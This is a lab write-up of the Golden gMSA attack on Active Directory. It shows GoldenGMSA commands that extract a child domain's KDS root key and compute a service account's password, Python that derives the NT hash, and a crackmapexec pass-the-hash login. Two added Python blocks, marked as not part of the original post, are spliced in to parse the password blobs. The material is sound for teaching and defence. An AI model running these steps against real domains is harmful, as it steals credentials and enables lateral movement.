Golden gMSA Attacks

Group Managed Service Accounts (gMSA) are domain accounts whose passwords are managed automatically by Active Directory. gMSA accounts use 240-byte randomly generated passwords, which are rotated automatically every 30 days.

A computer account that is authorised to read a gMSA password does so by reading the msDS-ManagedPassword attribute in Active Directory.

In this article, we look at attacking gMSA accounts from a child domain. The following systems are used:

  • DC01.bordergate.local – domain controller for the forest root (parent domain) bordergate.local
  • SERVER1.bordergate.local – a member server in the bordergate.local domain
  • CDC01.child.bordergate.local – a domain controller in child.bordergate.local, a child domain of bordergate.local

Configuring gMSA Accounts

In the parent domain, use the following PowerShell commands to create the gMSA account:

# Generate a new root key for the Microsoft Group Key Distribution Service (KdsSvc). Backdating the effective time avoids the usual 10-hour wait in a lab.
PS C:\Users\Administrator> Add-KdsRootKey -EffectiveTime ((Get-Date).AddHours(-10))

# Create a group, and add a member server that will use a gMSA
PS C:\Users\Administrator> New-ADGroup -Name gMSAGroup -GroupScope DomainLocal
PS C:\Users\Administrator> Add-ADGroupMember -Identity gMSAGroup -Members SERVER1$

# Create the gMSA and assign it to the group
PS C:\Users\Administrator> New-ADServiceAccount gmsa1 -DNSHostname gmsa1.bordergate.local -PrincipalsAllowedToRetrieveManagedPassword gMSAGroup -PrincipalsAllowedToDelegateToAccount gMSAGroup

Next, reboot the server that will use the gMSA (SERVER1 in this case) and run the following commands:

# Make sure the RSAT AD PowerShell tools are installed
PS C:\Users\Administrator> Install-WindowsFeature RSAT-AD-PowerShell
Success Restart Needed Exit Code      Feature Result
------- -------------- ---------      --------------
True    No             Success        {Remote Server Administration Tools, Activ...
# Install the account and test it
PS C:\Users\Administrator.BORDERGATE> Install-ADServiceAccount -Identity gmsa1
PS C:\Users\Administrator.BORDERGATE> Test-ADServiceAccount gmsa1

The gMSA account should now be available for use in applications such as IIS and MSSQL.

The Attack

If the Key Distribution Service (KDS) root key is compromised, an adversary can compute every gMSA password derived from it. The KDS root key is replicated to every domain in the forest, so compromising a child domain is enough to extract it.

The attack can be performed with GoldenGMSA: https://github.com/Semperis/GoldenGMSA. For it to work, we need to be logged in either as a Domain Administrator of the child domain or as the computer account of the child domain controller.

First, in the child domain, we extract the KDS root key:

C:\Users\Administrator\Desktop> echo %USERDOMAIN%
CHILD
C:\Users\Administrator\Desktop> hostname
CDC01
C:\Users\Administrator\Desktop> GoldenGMSA.exe kdsinfo --forest child.bordergate.local
 
Guid:           a3a4ed04-9a6f-9365-ab81-d20e52dd374f
Base64 blob:    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

Next, we gather details of the service account we will target. In this instance, only one account is configured:

GoldenGMSA.exe gmsainfo -d bordergate.local

sAMAccountName:         gmsa1$
objectSid:              S-1-5-21-678665010-2561942565-514098031-1109
rootKeyGuid:            a3a4ed04-9a6f-9365-ab81-d20e52dd374f
msds-ManagedPasswordID: AQAAAEtEU0sCAAAAagEAAAUAAAAKAAAABO2ko2+aZZOrgdIOUt03TwAAAAAiAAAAIgAAAGIAbwByAGQAZQByAGcAYQB0AGUALgBsAG8AYwBhAGwAAABiAG8AcgBkAGUAcgBnAGEAdABlAC4AbABvAGMAYQBsAAAA
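The msds-ManagedPasswordID value printed above can be decoded offline to see which KDS root key, and which key-cycle interval, the account's current password was derived from; that is what an auditor needs when inventorying which gMSAs depend on a given root key. The following Python is an added example, not part of the original post or of the GoldenGMSA tool. It assumes the blob layout used by public gMSA tooling (the field names here are descriptive, not Microsoft's) and the key-cycle lengths from MS-GKDI (an L2 key lasts 10 hours, an L1 key 32 L2 keys, an L0 key 32 L1 keys, counted from the FILETIME epoch); its input is the value shown in the gmsainfo output above.

```python
import base64
import struct
import uuid
from datetime import datetime, timedelta

# msds-ManagedPasswordID layout as read by public gMSA tooling (assumption: the
# field names are descriptive, not Microsoft's); all integers little-endian:
#   uint32 version | char[4] magic "KDSK" | uint32 flags
#   uint32 l0 | uint32 l1 | uint32 l2             (KDS key-cycle indices)
#   byte[16] root key GUID (little-endian GUID encoding)
#   uint32 cb_unknown | uint32 cb_domain | uint32 cb_forest
#   byte[cb_unknown] | domain (UTF-16LE, NUL-terminated) | forest (same)
_HEADER = struct.Struct("<I4sIIII16sIII")

# Key-cycle lengths from MS-GKDI (the assumption the date calculation relies on):
# an L2 key lasts 10 hours, an L1 key 32 L2 keys, an L0 key 32 L1 keys,
# all counted from the FILETIME epoch.
_L2_PERIOD = timedelta(hours=10)
_FILETIME_EPOCH = datetime(1601, 1, 1)

# The value printed by gmsainfo above (taken from the post, not constructed).
PAGE_PWDID = "AQAAAEtEU0sCAAAAagEAAAUAAAAKAAAABO2ko2+aZZOrgdIOUt03TwAAAAAiAAAAIgAAAGIAbwByAGQAZQByAGcAYQB0AGUALgBsAG8AYwBhAGwAAABiAG8AcgBkAGUAcgBnAGEAdABlAC4AbABvAGMAYQBsAAAA"


def parse_managed_password_id(b64: str) -> dict:
    """Decode one msds-ManagedPasswordID value into its fields."""
    blob = base64.b64decode(b64)
    if len(blob) < _HEADER.size:
        raise ValueError("blob too short for a managed password id header")
    (version, magic, flags, l0, l1, l2, guid_le,
     cb_unknown, cb_domain, cb_forest) = _HEADER.unpack_from(blob, 0)
    if magic != b"KDSK":
        raise ValueError("missing KDSK magic; not a managed password id")
    pos = _HEADER.size + cb_unknown
    domain = blob[pos:pos + cb_domain].decode("utf-16-le").rstrip("\x00")
    pos += cb_domain
    forest = blob[pos:pos + cb_forest].decode("utf-16-le").rstrip("\x00")
    if pos + cb_forest != len(blob):
        raise ValueError("trailing bytes after forest name")
    # l0/l1/l2 identify the key-cycle interval the password was derived in;
    # its start time follows from the cycle lengths above.
    interval_start = _FILETIME_EPOCH + _L2_PERIOD * ((l0 * 32 + l1) * 32 + l2)
    return {
        "version": version,
        "flags": flags,
        "l0": l0, "l1": l1, "l2": l2,
        "root_key_guid": str(uuid.UUID(bytes_le=guid_le)),
        "domain": domain,
        "forest": forest,
        "interval_start_utc": interval_start,
    }


def group_by_root_key(records):
    """Inventory helper: map root key GUID -> gMSA names, for records of the form
    (sAMAccountName, msds-ManagedPasswordID base64) as gmsainfo prints them."""
    by_key = {}
    for name, pwdid in records:
        info = parse_managed_password_id(pwdid)
        by_key.setdefault(info["root_key_guid"], []).append(name)
    return by_key


if __name__ == "__main__":
    for key, value in parse_managed_password_id(PAGE_PWDID).items():
        print(f"{key:>20}: {value}")
    print(group_by_root_key([("gmsa1$", PAGE_PWDID)]))
```

Run against the post's value, the decoder returns the same root key GUID that gmsainfo printed, which is the cross-check that the layout assumption holds; the l0/l1/l2 indices place the interval start in late January 2024. Feeding group_by_root_key the (name, msds-ManagedPasswordID) pairs for every gMSA in the forest gives the blast radius of a single root key.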

Next, we combine the gathered details with the KDS root key to compute the account's current password.

GoldenGMSA.exe compute --sid S-1-5-21-678665010-2561942565-514098031-1109 --pwdid AQAAAEtEU0sCAAAAagEAAAUAAAAKAAAABO2ko2+aZZOrgdIOUt03TwAAAAAiAAAAIgAAAGIAbwByAGQAZQByAGcAYQB0AGUALgBsAG8AYwBhAGwAAABiAG8AcgBkAGUAcgBnAGEAdABlAC4AbABvAGMAYQBsAAAA --kdskey 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
zQkVszU7u2Tg7Dd/0Cg3DfkrUseJFCjNxn62GEtSPR2yRsMvYweEkPAO+NZH0UjUeVRRXiMnz++YxYJmS0wPbMQWWQACAAAACAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAGgAAABDAE4APQBEAEMAMAAxACwATwBVAD0ARABvAG0AYQBpAG4AIABDAG8AbgB0AHIAbwBsAGwAZQByAHMALABEAEMAPQBiAG8AcgBkAGUAcgBnAGEAdABlACwARABDAD0AbABvAGMAYQBsAND+fYTTUdoBuFyDsn9R2gEAAAAAAAAAAEAAAAAAAAAA/ACXmfbkrF3+wijRGR4s4YyrntDTApi5okeZBs0TOQrm07kjXivWAEnX9N4ChSKODvbvwU//D4Z1pwOWeWkcTg==

Base64 Encoded Password:        IC7RDElLHdcPZDQ3gXNU8RVwR4Zj4vbiwdK/j/zTIwMfpDemMUvJ1aRUdNxcQk0vH5Q5kIZFypsz1v+6pvziAnn38SKLv5TVl78BRz3L4wOUuLEZiuQ0pxF602BJJlALhFSgLjrU5WejfOIiPQpUpRlcIHWmStCwPmP8KRBJThSiZOlM9xTMUCZp0lRIuJ2X9mc+RK1u1D4luRCzqGoYhGXS8PVwdXXPRJHRr6FEWj2X4hJc6dYkr3RzCs7tENVdeRvkQZ/x1T9f5GrqkC6tTSrtMA7EFwTxY7pIuOhpC2MAGYXAYg1+F5muYwSei7tSZESKrDOOUpjATxatQKURbg==

The password is Base64 encoded because it contains non-printable characters. Rather than use it directly, we calculate the account's NT hash:

import base64
import hashlib

# Base64 string printed by "GoldenGMSA.exe compute" above
base64_input = "IC7RDElLHdcPZDQ3gXNU8RVwR4Zj4vbiwdK/j/zTIwMfpDemMUvJ1aRUdNxcQk0vH5Q5kIZFypsz1v+6pvziAnn38SKLv5TVl78BRz3L4wOUuLEZiuQ0pxF602BJJlALhFSgLjrU5WejfOIiPQpUpRlcIHWmStCwPmP8KRBJThSiZOlM9xTMUCZp0lRIuJ2X9mc+RK1u1D4luRCzqGoYhGXS8PVwdXXPRJHRr6FEWj2X4hJc6dYkr3RzCs7tENVdeRvkQZ/x1T9f5GrqkC6tTSrtMA7EFwTxY7pIuOhpC2MAGYXAYg1+F5muYwSei7tSZESKrDOOUpjATxatQKURbg=="
# The NT hash is MD4 over the raw password bytes. hashlib's "md4" comes from OpenSSL;
# where the legacy provider is not loaded it raises "unsupported hash type".
print(hashlib.new("md4", base64.b64decode(base64_input)).hexdigest())
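Two things the post leaves implicit: what the msDS-ManagedPassword attribute mentioned at the start actually contains (MS-ADTS describes it as MSDS-MANAGEDPASSWORD_BLOB: a 16-byte header of offsets, the current and previous passwords as NUL-terminated UTF-16LE strings, and two 64-bit intervals in 100-nanosecond units that tell a reader when to re-query and when the password will have rolled), and that hashlib's "md4" is unavailable wherever OpenSSL's legacy provider is not loaded, so the snippet above can fail with "unsupported hash type". The Python below is an added example, not code from the post: it carries its own MD4, parses a blob of that layout, and derives the NT hash the same way the snippet above does. The blob it parses is constructed here (build_managed_password_blob and sample_password are helpers invented for this example, and the alignment padding they emit is an assumption); no real password appears in it.

```python
import base64
import random
import struct

_M32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _M32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), so the NT hash step does not depend on
    hashlib.new("md4") and OpenSSL's legacy provider."""
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2_idx = [(i % 4) * 4 + i // 4 for i in range(16)]            # 0,4,8,12,1,5,...
    r3_idx = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                                         # round 1: F
            a = _rotl((a + ((b & c) | (~b & d)) + x[i]) & _M32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                         # round 2: G
            a = _rotl((a + ((b & c) | (b & d) | (c & d)) + x[r2_idx[i]] + 0x5A827999) & _M32,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                         # round 3: H
            a = _rotl((a + (b ^ c ^ d) + x[r3_idx[i]] + 0x6ED9EBA1) & _M32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & _M32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


# MSDS-MANAGEDPASSWORD_BLOB header (MS-ADTS 2.2.19.1): Version, Reserved, Length,
# CurrentPasswordOffset, PreviousPasswordOffset, QueryPasswordIntervalOffset,
# UnchangedPasswordIntervalOffset. Offsets are from the start of the blob.
_HDR = struct.Struct("<HHIHHHH")


def _read_wstr(blob: bytes, off: int) -> bytes:
    """Return a NUL-terminated UTF-16LE string (without the terminator). The terminator
    is a 16-bit NUL on an even boundary; a byte-wise search for b"\\x00\\x00" could stop
    early inside random password bytes, so scan one code unit at a time."""
    end = off
    while end + 2 <= len(blob):
        if blob[end:end + 2] == b"\x00\x00":
            return blob[off:end]
        end += 2
    raise ValueError("unterminated UTF-16 string in managed password blob")


def parse_managed_password(blob: bytes) -> dict:
    version, _reserved, length, cur_off, prev_off, qpi_off, upi_off = _HDR.unpack_from(blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("malformed msDS-ManagedPassword blob")
    current = _read_wstr(blob, cur_off)
    previous = _read_wstr(blob, prev_off) if prev_off else b""
    (query_interval,) = struct.unpack_from("<Q", blob, qpi_off)
    (unchanged_interval,) = struct.unpack_from("<Q", blob, upi_off)
    return {
        "current_password": current,
        "previous_password": previous,
        "nt_hash": md4(current).hex(),           # NT hash = MD4 over the UTF-16LE bytes
        "query_interval_s": query_interval / 10_000_000,
        "unchanged_interval_s": unchanged_interval / 10_000_000,
    }


def build_managed_password_blob(current: bytes, previous: bytes = b"",
                                query_interval_s: int = 3600,
                                unchanged_interval_s: int = 30 * 86400) -> bytes:
    """Constructed blob for this example, laid out like the real attribute."""
    cur_off = _HDR.size
    body = current + b"\x00\x00"
    prev_off = 0
    if previous:
        prev_off = cur_off + len(body)
        body += previous + b"\x00\x00"
    body += b"\x00" * (-(cur_off + len(body)) % 8)      # AlignmentPadding (assumed 8-byte)
    qpi_off = cur_off + len(body)
    upi_off = qpi_off + 8
    body += struct.pack("<QQ", query_interval_s * 10_000_000, unchanged_interval_s * 10_000_000)
    return _HDR.pack(1, 0, cur_off + len(body), cur_off, prev_off, qpi_off, upi_off) + body


def sample_password(seed: int) -> bytes:
    """Constructed stand-in for a 256-byte managed password: 128 seeded-random UTF-16
    code units, none of them NUL (a NUL would terminate the string early)."""
    rng = random.Random(seed)
    return struct.pack("<128H", *(rng.randrange(1, 0xD800) for _ in range(128)))


def nt_hash_from_base64(b64: str) -> str:
    """The post's computation: MD4 over the Base64-decoded password bytes."""
    return md4(base64.b64decode(b64)).hex()


if __name__ == "__main__":
    blob = build_managed_password_blob(sample_password(7), sample_password(8))
    info = parse_managed_password(blob)
    print("NT hash:", info["nt_hash"], "next roll in", info["unchanged_interval_s"], "s")
```

A defender reading the attribute from an authorised host (for instance to confirm that rotation is actually happening) can hand the raw bytes to parse_managed_password and compare unchanged_interval_s with the expected 30-day window; the hash is computed only to mirror the post's verification step.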

With the NT hash calculated, we can verify that the credential works:

crackmapexec smb 192.168.1.198 -u 'gmsa1$' -H 9d98a5586932c24eaf5c221c5780ce7d
SMB         192.168.1.198   445    SERVER1          [*] Windows 10.0 Build 20348 x64 (name:SERVER1) (domain:bordergate.local) (signing:False) (SMBv1:False)
SMB         192.168.1.198   445    SERVER1          [+] bordergate.local\gmsa1$:9d98a5586932c24eaf5c221c5780ce7d (Pwn3d!)

In Conclusion

gMSA accounts help prevent Kerberoasting and other brute-force attacks. The Golden gMSA attack highlights that domains within a forest should not be considered trust boundaries.